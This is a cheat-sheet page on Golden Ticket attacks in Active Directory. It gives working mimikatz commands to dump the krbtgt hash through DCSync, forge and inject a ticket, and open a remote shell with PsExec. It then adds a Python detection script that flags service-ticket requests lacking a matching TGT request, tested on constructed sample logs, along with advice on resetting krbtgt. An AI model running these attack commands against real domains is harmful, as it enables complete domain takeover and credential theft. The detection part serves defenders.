Golden Ticket Attacks
What is it?
When the krbtgt account is compromised, the domain is owned: access can be requested to any resource or system on the domain.

Golden tickets == complete access to every machine
# Start mimikatz with privilege::debug
# Grab the krbtgt hash using DCSync
lsadump::dcsync /user:DOMAIN\krbtgt
# Grab the domain SID and the krbtgt password hash
# Generate the Golden ticket
kerberos::golden /User:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /id:500 /ptt
# Now you should be able to open sessions using the golden ticket
misc::cmd
# Now you should be able to access all resources using the golden ticket
# For example: start a remote cmd.exe using psexec
PsExec.exe \\REMOTE_IP cmd.exe
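The defender-side hook in the procedure above is that a golden ticket is a forged TGT: it is built offline from the krbtgt hash and never goes through an AS-REQ on a domain controller, so the DC logs a service ticket request (event 4769) for an account that has no matching TGT request (event 4768) or renewal (event 4770) inside the TGT lifetime. The following script, added here as an illustration and not part of the original page, runs that heuristic over a constructed sample of DC audit events. The log format, the account and IP values, and the 10-hour lookback (the default "Maximum lifetime for user ticket" setting) are assumptions; in a real environment the events must be aggregated from every DC in the domain, because the TGT may have been issued by a different DC than the one serving the TGS request.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample of DC Kerberos audit events (not real log data).
# Format: <ISO timestamp> <EventID> <account> <client IP>
# 4768 = TGT requested (AS-REQ), 4769 = service ticket requested (TGS-REQ),
# 4770 = ticket renewed (refreshes the TGT lifetime window).
SAMPLE_LOG = """\
2024-03-01T01:00:00 4768 carol 10.0.0.12
2024-03-01T08:00:00 4768 alice 10.0.0.5
2024-03-01T08:05:00 4769 alice 10.0.0.5
2024-03-01T09:12:00 4769 Administrator 10.0.0.77
2024-03-01T15:00:00 4769 carol 10.0.0.12
2024-03-01T17:50:00 4770 alice 10.0.0.5
2024-03-01T20:30:00 4769 alice 10.0.0.5
2024-03-01T21:00:00 4769 bob 10.0.0.9
"""


@dataclass(frozen=True)
class KerbEvent:
    time: datetime
    event_id: int
    account: str
    client_ip: str


def parse_events(text):
    """Parse the constructed log format into KerbEvent objects, sorted by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, account, ip = line.split()
        # Account names are case-insensitive in AD; normalise so lookups match.
        events.append(KerbEvent(datetime.fromisoformat(ts), int(eid), account.lower(), ip))
    return sorted(events, key=lambda e: e.time)


def find_orphan_tgs_requests(events, lookback=timedelta(hours=10)):
    """Return (event, reason) pairs for 4769 events whose account has no 4768/4770
    within `lookback` before them. A forged TGT produces exactly this pattern,
    because the DC never issued (or renewed) the ticket being presented."""
    last_tgt = {}  # account -> time of most recent TGT issue or renewal
    findings = []
    for ev in events:
        if ev.event_id in (4768, 4770):
            last_tgt[ev.account] = ev.time
        elif ev.event_id == 4769:
            issued = last_tgt.get(ev.account)
            if issued is None:
                findings.append((ev, "TGS request with no TGT request seen for this account"))
            elif ev.time - issued > lookback:
                findings.append((ev, "TGS request with last TGT request older than ticket lifetime"))
    return findings


if __name__ == "__main__":
    for ev, reason in find_orphan_tgs_requests(parse_events(SAMPLE_LOG)):
        print(f"{ev.time.isoformat()} {ev.account} from {ev.client_ip}: {reason}")
```

On the sample, `administrator` and `bob` are flagged because no TGT request was ever logged for them, and `carol` is flagged because her only TGT request is 14 hours old; `alice` is not flagged because the 4770 renewal refreshed her window. Expect false positives from incomplete log collection (a missing DC, log rotation, or retention shorter than the TGT lifetime), so treat a hit as a triage lead, not a verdict. The mitigation the heuristic cannot provide is invalidating the forged tickets themselves, which requires resetting the krbtgt password twice (with replication in between) so both the current and previous key are replaced.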
Reference: Attacking Kerberos